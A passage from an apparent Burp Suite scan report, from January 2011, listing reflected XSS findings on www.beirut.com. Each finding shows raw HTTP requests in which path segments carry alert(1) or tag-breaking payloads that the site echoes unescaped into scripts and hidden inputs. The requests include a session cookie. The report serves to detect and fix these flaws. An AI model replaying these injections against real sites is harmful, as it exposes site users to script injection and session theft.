Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet3793c'-alert(1)-'8f530d683c6/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet3793c'-alert(1)-'8f530d683c6/Personal-and-Opinion';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.636. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4d6'-alert(1)-'a9798730560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Personal-and-Opinion1a4d6'-alert(1)-'a9798730560/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Personal-and-Opinion1a4d6'-alert(1)-'a9798730560';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.637. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65fc5'-alert(1)-'382a9161d3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet65fc5'-alert(1)-'382a9161d3a/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet65fc5'-alert(1)-'382a9161d3a/Photography-and-Arts';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.638. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faeae"><a>7bb18f01c4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetfaeae"><a>7bb18f01c4e/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:15:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetfaeae"><a>7bb18f01c4e">
...[SNIP]...

4.639. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 687ed'-alert(1)-'a4afccbfb8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Photography-and-Arts687ed'-alert(1)-'a4afccbfb8b/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Photography-and-Arts687ed'-alert(1)-'a4afccbfb8b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.640. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31cf'-alert(1)-'20945d3d02c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetf31cf'-alert(1)-'20945d3d02c/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internetf31cf'-alert(1)-'20945d3d02c/Politics-Media-and-News';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.641. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e27"><a>aed8fb31004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet70e27"><a>aed8fb31004/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:26:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet70e27"><a>aed8fb31004">
...[SNIP]...

4.642. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3016d'-alert(1)-'e2875733136 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Politics-Media-and-News3016d'-alert(1)-'e2875733136/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Politics-Media-and-News3016d'-alert(1)-'e2875733136';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.643. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93751"><a>171bd462df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet93751"><a>171bd462df7/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet93751"><a>171bd462df7">
...[SNIP]...

4.644. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b8d8'-alert(1)-'4f6b8ce44b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet5b8d8'-alert(1)-'4f6b8ce44b4/Real-Estate/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:27:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet5b8d8'-alert(1)-'4f6b8ce44b4/Real-Estate';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.645. http://www.beirut.com/Online-Internet/Real-Estate/5645685094 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Real-Estate/5645685094

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db898'-alert(1)-'42b9dfced57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Real-Estatedb898'-alert(1)-'42b9dfced57/5645685094 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:32:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Real-Estatedb898'-alert(1)-'42b9dfced57';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.646. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65f"><a>29fc62eb03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet7c65f"><a>29fc62eb03/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet7c65f"><a>29fc62eb03">
...[SNIP]...

4.647. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e56'-alert(1)-'d9e4b68e571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetb8e56'-alert(1)-'d9e4b68e571/Recreation/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetb8e56'-alert(1)-'d9e4b68e571/Recreation';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.648. http://www.beirut.com/Online-Internet/Recreation/182769021 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Recreation/182769021

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bec0'-alert(1)-'b5798d3d725 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Recreation3bec0'-alert(1)-'b5798d3d725/182769021 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
